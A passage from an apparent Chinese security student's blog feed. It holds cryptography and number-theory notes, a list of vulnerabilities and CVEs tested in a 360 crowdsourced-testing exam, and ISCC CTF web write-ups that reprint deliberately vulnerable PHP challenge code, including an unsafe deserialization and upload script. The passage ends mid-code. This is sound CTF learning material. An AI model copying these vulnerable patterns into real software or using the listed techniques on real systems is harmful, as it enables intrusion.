id="第五节-其他密码"><a href="#第五节-其他密码" class="headerlink" title="第五节 其他密码"></a>第五节 其他密码</h5><img src="https://s2.loli.net/2022/02/04/2iWRCk96Kqce41H.png" alt="image-20210922095840573" style="zoom: 67%;" /><h4 id="第五章-流密码"><a href="#第五章-流密码" class="headerlink" title="第五章-流密码"></a>第五章-流密码</h4><p>分类:</p><ul><li>同步流密钥</li><li>自同步流密钥</li></ul><h4 id="第六章-公钥密码"><a href="#第六章-公钥密码" class="headerlink" title="第六章-公钥密码"></a>第六章-公钥密码</h4><h4 id="第七章-消息认证"><a href="#第七章-消息认证" class="headerlink" title="第七章-消息认证"></a>第七章-消息认证</h4><h5 id="1-消息认证"><a href="#1-消息认证" class="headerlink" title="1.消息认证"></a>1.消息认证</h5><h5 id="2-散列算法"><a href="#2-散列算法" class="headerlink" title="2.散列算法"></a>2.散列算法</h5><h5 id="3-MAC算法"><a href="#3-MAC算法" class="headerlink" title="3.MAC算法"></a>3.MAC算法</h5><p>hash是无密钥的</p><p>MAC是有密钥的</p><p>生日悖论</p><img src="https://s2.loli.net/2022/02/04/RTt3lE5zNJ1YHCp.png" alt="image-20210926214703360" style="zoom:67%;" /><p>对输出n比特的hash函数,生日攻击的代价为$2^{n/2}$</p><h4 id="第八章-数字签名"><a href="#第八章-数字签名" class="headerlink" title="第八章-数字签名"></a>第八章-数字签名</h4><h4 id="第九章-密钥管理"><a href="#第九章-密钥管理" class="headerlink" title="第九章-密钥管理"></a>第九章-密钥管理</h4><p>1.加密</p><ul><li>链路加密</li><li>端到端加密</li></ul><p>2.密码系统的安全性取决于算法强度和密钥长度</p>]]></content>
<categories>
<category> 密码学 </category>
</categories>
<tags>
<tag> 密码学 </tag>
</tags>
</entry>
<entry>
<title>初等数论学习</title>
<link href="/2021/08/06/%E6%95%B0%E8%AE%BA/"/>
<url>/2021/08/06/%E6%95%B0%E8%AE%BA/</url>
<content type="html"><![CDATA[<blockquote><p>补充信息安全数学基础,为密码学做点铺垫,学习一下初等数论</p></blockquote><p><strong>密码学中的数论基础</strong></p><ul><li>整除和带余除法</li><li>欧几里得算法</li><li>模运算</li><li>素数</li><li>费马定理和欧拉定理</li><li>素性测试</li><li>中国剩余定理</li><li>离散对数</li></ul><p><strong>学习安排</strong></p><ul><li>整数的离散性</li><li>整除的概念和性质</li><li>带余数的除法</li><li>欧几里得算法</li><li>扩展欧几里得算法</li><li>贝祖定理</li><li>素数与合数</li><li>算术基本定理</li><li>公因数和公倍数</li><li>同余的概念和性质</li><li>同余类和剩余系</li><li>费马小定理</li><li>欧拉定理</li><li>中国剩余定理</li><li>拉格朗日定理</li><li>Wolstenholme定理</li><li>二次剩余和欧拉判别</li><li>高斯引理</li><li>二次互反律</li><li>原根</li><li>高斯函数</li><li>位运算和进位制</li></ul>]]></content>
<categories>
<category> 密码学 </category>
</categories>
<tags>
<tag> 数论 </tag>
<tag> 密码学 </tag>
</tags>
</entry>
<entry>
<title>记一次360众测考核</title>
<link href="/2021/06/01/360/"/>
<url>/2021/06/01/360/</url>
<content type="html"><![CDATA[<p>网址如下:</p><p><a href="https://zhongce.360.cn/">https://zhongce.360.cn/</a></p><p>想参与360众测活动,需要注册登陆,并完成考核。</p><p><strong>考核内容</strong>:</p><p>1.选择题</p><p>2.判断题</p><p>3.实战题(分值最大)</p><p>题目都比较简单,实战题是CTF形式,拿到一半以上的flag应该就可以通过了。</p><p><strong>主要题型如下:</strong></p><p>1.各种Web漏洞</p><ul><li>SQL注入</li><li>XSS跨站脚本攻击</li><li>文件上传</li><li>命令执行</li><li>编辑器漏洞</li></ul><p>2.流量分析题</p><p>比较简单,会用wireshark,分析简单的数据包就可以了。</p><p>3.CMS</p><p>针对特定CMS系统的分析题。</p><p>4.CVE</p><p>经典CVE的复现和分析。</p><p><strong>总结了几个常考的点:</strong></p><ul><li>GET\POST</li><li>CVE-2011-3923(struts2)</li><li>webshell上传</li><li>Samba远程命令执行漏洞(CVE-2017-7494)</li><li>drupa7-CVE-2018-7600</li><li>php文件包含(<a href="http://www.zip源码)/">www.zip源码)</a></li><li>6379端口Redis未授权访问漏洞</li><li>wireshark流量分析(xiaoma.php)</li><li>文件上传绕过方式</li><li>SQL注入(sqlmap)(要知道注入点在哪)</li><li>代码审计(php弱类型)</li><li>873rsync服务</li><li>后门扫描</li><li>Supervisor远程命令执行漏洞(CVE-2017-11610)</li><li>User-Agent头伪造</li><li>PHPMailer远程命令执行漏洞</li><li>Referer来源伪造</li><li>万能密码</li><li>tomcat弱口令上传</li><li>CMS</li><li>弱口令</li><li>Bash远程代码执行漏洞“破壳”(CVE-2014-6271)</li><li>Drupal 远程代码执行漏洞CVE-2019-6339</li></ul><img src="https://i.loli.net/2021/09/07/NZShObwgc2L3IDX.jpg" alt="360zc" style="zoom:50%;" />]]></content>
<categories>
<category> 渗透 </category>
</categories>
</entry>
<entry>
<title>六月加油</title>
<link href="/2021/05/24/ganwu/"/>
<url>/2021/05/24/ganwu/</url>
<content type="html"><![CDATA[<p>马上就要高考了,受老师和同学之托,写一段加油的话给即将上高考战场的学弟学妹,也勉励未来的自己。</p><blockquote><p>我们都不曾平庸,目的向来无关紧要,你所期待遇见的都在途中。所以啊,就把迷惘都写进诗里,在一路颠沛中弹奏成歌,在六月的阳光下高唱出来,惊起身后的鸥鸟,唱醒这早春的天,唱热你倔强的眼眶,唱遍你要去的地方。愿九月的你,生活在现在渴望的远方。</p></blockquote>]]></content>
<categories>
<category> 感悟 </category>
</categories>
</entry>
<entry>
<title>ISCC练武题</title>
<link href="/2021/05/07/ISCC/"/>
<url>/2021/05/07/ISCC/</url>
<content type="html"><![CDATA[<h3 id="ISCC练武题"><a href="#ISCC练武题" class="headerlink" title="ISCC练武题"></a>ISCC练武题</h3><p>适合新手的题,练练手</p><h3 id="WEB-1"><a href="#WEB-1" class="headerlink" title="WEB-1"></a>WEB-1</h3><img src="https://i.loli.net/2021/05/07/ZN8dtFzLeXMafnV.png" alt="image-20210507222242720" style="zoom:67%;" /><p>打开环境,是一个投票页面</p><img src="https://i.loli.net/2021/05/07/KLXSEbzMT3PINrj.png" alt="image-20210507222313417" style="zoom:67%;" /><p>题目要求:在20秒之内让左边的票数高过右边的</p><ul><li>方法一:Python写脚本模拟点击,实现刷票</li><li>方法二:修改左右客服的ID</li><li>方法三:直接在控制台修改左边票数的数据</li></ul><h3 id="WEB-2"><a href="#WEB-2" class="headerlink" title="WEB-2"></a>WEB-2</h3><p>查看源码</p><img src="https://i.loli.net/2021/05/07/NytIE17VMZdvFGk.png" alt="image-20210507223605027" style="zoom:67%;" /><p>是JS编码</p><p><a href="http://www.jsfuck.com/">http://www.jsfuck.com/</a></p><p>打开在线网站,直接提交这串编码即出flag</p><blockquote><p>JSFuck is an esoteric and educational programming style based on the atomic parts of JavaScript. It uses only six different characters to write and execute code.</p><p>It does not depend on a browser, so you can even run it on Node.js.</p><p>Use the form below to convert your own script. Uncheck “eval source” to get back a plain string.</p></blockquote><h3 id="WEB-3"><a href="#WEB-3" class="headerlink" title="WEB-3"></a>WEB-3</h3><img src="https://i.loli.net/2021/05/07/ONGX2xdjBtpCzrW.png" alt="image-20210507224002677" style="zoom:67%;" /><p>查看robots.txt</p><p><img src="https://i.loli.net/2021/05/07/bYQrjdzsxecnNwT.png" alt="image-20210507224038667"></p><p>继续查看code.txt</p><p>出现一串PHP代码</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"><p>code.txt</p></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span> (<span class="variable">$_GET</span>[<span class="string">'password'</span>])) {</span><br><span class="line"> </span><br><span class="line"><span class="keyword">if</span> (<span class="title function_ invoke__">preg_match</span> (<span class="string">"/^[a-zA-Z0-9]+$/"</span>, <span class="variable">$_GET</span>[<span class="string">'password'</span>]) === <span class="literal">FALSE</span>)</span><br><span class="line">{</span><br><span class="line"><span class="keyword">echo</span> <span class="string">'<p>You password must be alphanumeric</p>'</span>;</span><br><span class="line"></span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">else</span> <span class="keyword">if</span> (<span class="title function_ invoke__">strlen</span>(<span class="variable">$_GET</span>[<span class="string">'password'</span>]) < <span class="number">8</span> && <span class="variable">$_GET</span>[<span class="string">'password'</span>] > <span class="number">9999999</span>)</span><br><span class="line">{ </span><br><span class="line"> </span><br><span class="line"><span class="keyword">if</span> (<span class="title function_ invoke__">strpos</span> (<span class="variable">$_GET</span>[<span class="string">'password'</span>], <span class="string">'*-*'</span>) !== <span class="literal">FALSE</span>)</span><br><span class="line">{</span><br><span class="line"><span class="keyword">die</span>(<span class="string">'Flag: '</span> . <span class="variable">$flag</span>);</span><br><span class="line">}</span><br><span class="line"><span class="keyword">else</span></span><br><span class="line">{</span><br><span class="line"><span class="keyword">echo</span>(<span class="string">'<p>*-* have not been found</p>'</span>);</span><br><span class="line">}</span><br><span class="line">}</span><br><span class="line"><span class="keyword">else</span></span><br><span class="line">{</span><br><span class="line"><span class="keyword">echo</span> <span class="string">'<p>Invalid password</p>'</span>;</span><br><span class="line">}</span><br><span class="line">}</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure><p>根据正则表达以GET型提交即可。</p><p>注意是在根目录下提交GET请求。</p><p><img src="https://i.loli.net/2021/05/07/v8HjMO1YBSuLJTp.png" alt="image-20210507224313141"></p><h3 id="WEB-4"><a href="#WEB-4" class="headerlink" title="WEB-4"></a>WEB-4</h3><p>题目描述:ISCC客服一号冲冲冲(二)</p><img src="https://i.loli.net/2021/05/24/WQ9lAuUdn5hKTxR.png" alt="image-20210524115114413" style="zoom:67%;" /><p>打开之后是个伪装的登录框(其实是图片)</p><p>但是图片显示不完整</p><table><thead><tr><th align="left">值</th><th align="left">描述</th></tr></thead><tbody><tr><td align="left">visible</td><td align="left">默认值。内容不会被修剪,会呈现在元素框之外。</td></tr><tr><td align="left">hidden</td><td align="left">内容会被修剪,并且其余内容是不可见的。</td></tr><tr><td align="left">scroll</td><td align="left">内容会被修剪,但是浏览器会显示滚动条以便查看其余的内容。</td></tr><tr><td align="left">auto</td><td align="left">如果内容被修剪,则浏览器会显示滚动条以便查看其余的内容。</td></tr><tr><td align="left">inherit</td><td align="left">规定应该从父元素继承 overflow 属性的值。</td></tr></tbody></table><p>根据 CSS 布局 - Overflow,可以看出图片的完整部分。</p><p>下载图片,并进行LSB隐写破解和压缩文件隐藏破解,发现行不通。</p><p>根据之前题目得到的flag进行POST提交</p><p><img src="https://i.loli.net/2021/05/24/Et8rWxANakzXZyU.png" alt="image-20210524142323165"></p><p>修改admin</p><p><img src="https://i.loli.net/2021/05/24/4wajrbuW9MepE1O.png" alt="image-20210524142457440"></p><p><img src="https://i.loli.net/2021/05/24/RSx1fmegEFqhOYZ.png" alt="image-20210524142752396"></p><p>根据网上的提示,查看cookie,</p><p>CBC翻转攻击</p><p><img src="https://i.loli.net/2021/05/24/7I8GA5KWmoTaRws.png" alt="image-20210524143139217"></p><h3 id="WEB-5"><a href="#WEB-5" class="headerlink" title="WEB-5"></a>WEB-5</h3><p>打开网页,是4张猫猫图片</p><img src="https://i.loli.net/2021/05/24/4jmfypwBbWsXEIU.png" alt="image-20210524145620439" style="zoom:50%;" /><p>根据题目描述,这是一个ssti模板注入</p><p>这只猫叫小豆泥</p><p>信息收集:xiaodouni</p><img src="https://i.loli.net/2021/05/24/Qs5SJoCy2fvEzBx.png" alt="image-20210524145744276" style="zoom:67%;" /><h3 id="WEB-6"><a href="#WEB-6" class="headerlink" title="WEB-6"></a>WEB-6</h3><p>题目:Explore Ruby</p><h3 id="WEB-7"><a href="#WEB-7" class="headerlink" title="WEB-7"></a>WEB-7</h3><p>打开之后是个登录框</p><p>尝试万能密码和SQL注入都没成功</p><p>然后尝试弱口令:test : test</p><img src="https://i.loli.net/2021/05/07/guqNX8ATFSs7wa1.png" alt="image-20210507224844092" style="zoom:50%;" /><p>登录成功</p><p><img src="https://i.loli.net/2021/05/07/AP8uCZaVmjD3Glx.png" alt="image-20210507224920836"></p><p>图片地址是base64编码</p><p>解密即可出flag</p><h3 id="WEB-8"><a href="#WEB-8" class="headerlink" title="WEB-8"></a>WEB-8</h3><p><img src="https://i.loli.net/2021/05/24/Yar39ABEoGC71bQ.png" alt="image-20210524154528742"></p><p>源码如下:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br><span class="line">158</span><br><span class="line">159</span><br><span class="line">160</span><br><span class="line">161</span><br><span class="line">162</span><br><span class="line">163</span><br><span class="line">164</span><br><span class="line">165</span><br><span class="line">166</span><br><span class="line">167</span><br><span class="line">168</span><br><span class="line">169</span><br><span class="line">170</span><br><span class="line">171</span><br><span class="line">172</span><br><span class="line">173</span><br><span class="line">174</span><br><span class="line">175</span><br><span class="line">176</span><br><span class="line">177</span><br><span class="line">178</span><br><span class="line">179</span><br><span class="line">180</span><br><span class="line">181</span><br><span class="line">182</span><br><span class="line">183</span><br><span class="line">184</span><br><span class="line">185</span><br><span class="line">186</span><br><span class="line">187</span><br><span class="line">188</span><br><span class="line">189</span><br><span class="line">190</span><br><span class="line">191</span><br><span class="line">192</span><br><span class="line">193</span><br><span class="line">194</span><br><span class="line">195</span><br><span class="line">196</span><br><span class="line">197</span><br><span class="line">198</span><br><span class="line">199</span><br><span class="line">200</span><br><span class="line">201</span><br><span class="line">202</span><br><span class="line">203</span><br><span class="line">204</span><br><span class="line">205</span><br><span class="line">206</span><br><span class="line">207</span><br><span class="line">208</span><br><span class="line">209</span><br><span class="line">210</span><br><span class="line">211</span><br><span class="line">212</span><br><span class="line">213</span><br><span class="line">214</span><br><span class="line">215</span><br><span class="line">216</span><br><span class="line">217</span><br><span class="line">218</span><br><span class="line">219</span><br><span class="line">220</span><br><span class="line">221</span><br><span class="line">222</span><br><span class="line">223</span><br><span class="line">224</span><br><span class="line">225</span><br><span class="line">226</span><br><span class="line">227</span><br><span class="line">228</span><br><span class="line">229</span><br><span class="line">230</span><br><span class="line">231</span><br><span class="line">232</span><br><span class="line">233</span><br><span class="line">234</span><br><span class="line">235</span><br><span class="line">236</span><br><span class="line">237</span><br><span class="line">238</span><br><span class="line">239</span><br><span class="line">240</span><br><span class="line">241</span><br><span class="line">242</span><br><span class="line">243</span><br><span class="line">244</span><br><span class="line">245</span><br><span class="line">246</span><br><span class="line">247</span><br><span class="line">248</span><br><span class="line">249</span><br><span class="line">250</span><br><span class="line">251</span><br><span class="line">252</span><br><span class="line">253</span><br><span class="line">254</span><br><span class="line">255</span><br><span class="line">256</span><br><span class="line">257</span><br><span class="line">258</span><br><span class="line">259</span><br><span class="line">260</span><br><span class="line">261</span><br><span class="line">262</span><br><span class="line">263</span><br><span class="line">264</span><br><span class="line">265</span><br><span class="line">266</span><br><span class="line">267</span><br><span class="line">268</span><br><span class="line">269</span><br><span class="line">270</span><br><span class="line">271</span><br><span class="line">272</span><br><span class="line">273</span><br><span class="line">274</span><br><span class="line">275</span><br><span class="line">276</span><br><span class="line">277</span><br><span class="line">278</span><br><span class="line">279</span><br><span class="line">280</span><br><span class="line">281</span><br><span class="line">282</span><br><span class="line">283</span><br><span class="line">284</span><br><span class="line">285</span><br><span class="line">286</span><br><span class="line">287</span><br><span class="line">288</span><br><span class="line">289</span><br><span class="line">290</span><br><span class="line">291</span><br><span class="line">292</span><br><span class="line">293</span><br><span class="line">294</span><br><span class="line">295</span><br><span class="line">296</span><br><span class="line">297</span><br><span class="line">298</span><br><span class="line">299</span><br><span class="line">300</span><br><span class="line">301</span><br><span class="line">302</span><br><span class="line">303</span><br><span class="line">304</span><br><span class="line">305</span><br><span class="line">306</span><br><span class="line">307</span><br><span class="line">308</span><br><span class="line">309</span><br><span class="line">310</span><br><span class="line">311</span><br><span class="line">312</span><br><span class="line">313</span><br><span class="line">314</span><br><span class="line">315</span><br><span class="line">316</span><br><span class="line">317</span><br><span class="line">318</span><br><span class="line">319</span><br><span class="line">320</span><br><span class="line">321</span><br><span class="line">322</span><br><span class="line">323</span><br><span class="line">324</span><br><span class="line">325</span><br><span class="line">326</span><br><span class="line">327</span><br><span class="line">328</span><br><span class="line">329</span><br><span class="line">330</span><br><span class="line">331</span><br><span class="line">332</span><br><span class="line">333</span><br><span class="line">334</span><br><span class="line">335</span><br><span class="line">336</span><br><span class="line">337</span><br><span class="line">338</span><br><span class="line">339</span><br><span class="line">340</span><br><span class="line">341</span><br><span class="line">342</span><br><span class="line">343</span><br><span class="line">344</span><br><span class="line">345</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"></span><br><span class="line"><span class="title function_ invoke__">session_start</span>();</span><br><span class="line"><span class="title function_ invoke__">ini_set</span>(<span class="string">'max_execution_time'</span>, <span class="string">'5'</span>);</span><br><span class="line"><span class="title function_ invoke__">set_time_limit</span>(<span class="number">5</span>);</span><br><span class="line"></span><br><span class="line"><span class="variable">$status</span> = <span class="string">"new"</span>;</span><br><span class="line"><span class="variable">$cmd</span> = <span class="string">"whoami"</span>;</span><br><span class="line"><span class="variable">$is_upload</span> = <span class="literal">false</span>;</span><br><span class="line"><span class="variable">$is_unser_finished</span> = <span class="literal">false</span>;</span><br><span class="line"><span class="variable">$iscc_file</span> = <span class="literal">NULL</span>;</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">ISCC_Upload</span> </span>{</span><br><span class="line"></span><br><span class="line"> <span class="function"><span class="keyword">function</span> <span class="title">__wakeup</span>(<span class="params"></span>) </span>{</span><br><span class="line"> <span class="keyword">global</span> <span class="variable">$cmd</span>;</span><br><span class="line"> <span class="keyword">global</span> <span class="variable">$is_upload</span>;</span><br><span class="line"> <span class="variable">$cmd</span> = <span class="string">"whoami"</span>;</span><br><span class="line"> <span class="variable">$_SESSION</span>[<span class="string">'name'</span>] = <span class="title function_ invoke__">randstr</span>(<span class="number">14</span>);</span><br><span class="line"> <span class="variable">$is_upload</span> = (<span class="title function_ invoke__">count</span>(<span class="variable">$_FILES</span>) > <span class="number">0</span>);</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="function"><span class="keyword">function</span> <span class="title">__destruct</span>(<span class="params"></span>) </span>{</span><br><span class="line"> <span class="keyword">global</span> <span class="variable">$is_upload</span>;</span><br><span class="line"> <span class="keyword">global</span> <span class="variable">$status</span>;</span><br><span class="line"> <span class="keyword">global</span> <span class="variable">$iscc_file</span>;</span><br><span class="line"> <span class="variable">$status</span> = <span class="string">"upload_fail"</span>;</span><br><span class="line"> <span class="keyword">if</span> (<span class="variable">$is_upload</span>) {</span><br><span class="line"></span><br><span class="line"> <span class="keyword">foreach</span> (<span class="variable">$_FILES</span> <span class="keyword">as</span> <span class="variable">$key</span> => <span class="variable">$value</span>)</span><br><span class="line"> <span class="variable">$GLOBALS</span>[<span class="variable">$key</span>] = <span class="variable">$value</span>;</span><br><span class="line"> </span><br><span class="line"> <span class="keyword">if</span>(<span class="title function_ invoke__">is_uploaded_file</span>(<span class="variable">$iscc_file</span>[<span class="string">'tmp_name'</span>])) {</span><br><span class="line"> </span><br><span class="line"> <span class="variable">$check</span> = @<span class="title function_ invoke__">getimagesize</span>(<span class="variable">$iscc_file</span>[<span class="string">"tmp_name"</span>]);</span><br><span class="line"> </span><br><span class="line"> <span class="keyword">if</span>(<span class="variable">$check</span> !== <span class="literal">false</span>) {</span><br><span class="line"></span><br><span class="line"> <span class="variable">$target_dir</span> = <span class="string">"/var/tmp/"</span>;</span><br><span class="line"> <span class="variable">$target_file</span> = <span class="variable">$target_dir</span> . <span class="title function_ invoke__">randstr</span>(<span class="number">10</span>);</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> (<span class="title function_ invoke__">file_exists</span>(<span class="variable">$target_file</span>)) {</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"想啥呢?有东西了……<br>"</span>;</span><br><span class="line"> <span class="title function_ invoke__">finalize</span>();</span><br><span class="line"> <span class="keyword">exit</span>;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> (<span class="variable">$iscc_file</span>[<span class="string">"size"</span>] > <span class="number">500000</span>) {</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"东西塞不进去~<br>"</span>;</span><br><span class="line"> <span class="title function_ invoke__">finalize</span>();</span><br><span class="line"> <span class="keyword">exit</span>;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> (<span class="title function_ invoke__">move_uploaded_file</span>(<span class="variable">$iscc_file</span>[<span class="string">"tmp_name"</span>], <span class="variable">$target_file</span>)) {</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"我拿到了!<br>"</span>;</span><br><span class="line"> <span class="variable">$iscc_file</span> = <span class="variable">$target_file</span>;</span><br><span class="line"> <span class="variable">$status</span> = <span class="string">"upload_ok"</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"拿不到:(<br>"</span>;</span><br><span class="line"> <span class="title function_ invoke__">finalize</span>();</span><br><span class="line"> <span class="keyword">exit</span>;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="title function_ invoke__">finalize</span>();</span><br><span class="line"> <span class="keyword">exit</span>;</span><br><span class="line"> }</span><br><span class="line"> </span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"你真是个天才!<br>"</span>;</span><br><span class="line"> <span class="title function_ invoke__">finalize</span>();</span><br><span class="line"> <span class="keyword">exit</span>;</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">ISCC_ResetCMD</span> </span>{</span><br><span class="line"></span><br><span class="line"> <span class="keyword">protected</span> <span class="variable">$new_cmd</span> = <span class="string">"echo '新新世界,发号施令!'"</span>;</span><br><span class="line"></span><br><span class="line"> <span class="function"><span class="keyword">function</span> <span class="title">__wakeup</span>(<span class="params"></span>) </span>{</span><br><span class="line"> <span class="keyword">global</span> <span class="variable">$cmd</span>;</span><br><span class="line"> <span class="keyword">global</span> <span class="variable">$is_upload</span>;</span><br><span class="line"> <span class="keyword">global</span> <span class="variable">$status</span>;</span><br><span class="line"> <span class="variable">$_SESSION</span>[<span class="string">'name'</span>] = <span class="title function_ invoke__">randstr</span>(<span class="number">14</span>);</span><br><span class="line"> <span class="variable">$is_upload</span> = <span class="literal">false</span>;</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span>(!<span class="keyword">isset</span>(<span class="variable language_">$this</span>->new_cmd)) {</span><br><span class="line"> <span class="variable">$status</span> = <span class="string">"error"</span>;</span><br><span class="line"> <span class="variable">$error</span> = <span class="string">"你这罐子是空的!"</span>;</span><br><span class="line"> <span class="keyword">throw</span> <span class="keyword">new</span> <span class="built_in">Exception</span>(<span class="variable">$error</span>); </span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span>(!<span class="title function_ invoke__">is_string</span>(<span class="variable">$this</span>->new_cmd)) {</span><br><span class="line"> <span class="variable">$status</span> = <span class="string">"error"</span>;</span><br><span class="line"> <span class="variable">$error</span> = <span class="string">'东西都没给对!'</span>;</span><br><span class="line"> <span class="keyword">throw</span> <span class="keyword">new</span> <span class="built_in">Exception</span>(<span class="variable">$error</span>);</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="function"><span class="keyword">function</span> <span class="title">__destruct</span>(<span class="params"></span>) </span>{</span><br><span class="line"> <span class="keyword">global</span> <span class="variable">$cmd</span>;</span><br><span class="line"> <span class="keyword">global</span> <span class="variable">$status</span>;</span><br><span class="line"> <span class="variable">$status</span> = <span class="string">"reset"</span>;</span><br><span class="line"> <span class="keyword">if</span>(<span class="variable">$_SESSION</span>[<span class="string">'name'</span>] === <span class="string">'isccIsCciScc1scc'</span>) {</span><br><span class="line"> <span class="variable">$cmd</span> = <span class="variable language_">$this</span>->new_cmd;</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">ISCC_Login</span> </span>{</span><br><span class="line"></span><br><span class="line"> <span class="function"><span class="keyword">function</span> <span class="title">__wakeup</span>(<span class="params"></span>) </span>{</span><br><span class="line"> <span class="variable language_">$this</span>-><span class="title function_ invoke__">login</span>();</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="function"><span class="keyword">function</span> <span class="title">__destruct</span>(<span class="params"></span>) </span>{</span><br><span class="line"> <span class="variable language_">$this</span>-><span class="title function_ invoke__">logout</span>();</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="function"><span class="keyword">function</span> <span class="title">login</span>(<span class="params"></span>) </span>{</span><br><span class="line"> <span class="variable">$flag</span> = <span class="title function_ invoke__">file_get_contents</span>(<span class="string">"/flag"</span>);</span><br><span class="line"> <span class="variable">$pAssM0rd</span> = <span class="title function_ invoke__">hash</span>(<span class="string">"sha256"</span>, <span class="variable">$flag</span>);</span><br><span class="line"> <span class="keyword">if</span>(<span class="variable">$_GET</span>[<span class="string">'pAssM0rd'</span>] === <span class="variable">$pAssM0rd</span>)</span><br><span class="line"> <span class="variable">$_SESSION</span>[<span class="string">'name'</span>] = <span class="string">"isccIsCciScc1scc"</span>;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="function"><span class="keyword">function</span> <span class="title">logout</span>(<span class="params"></span>) 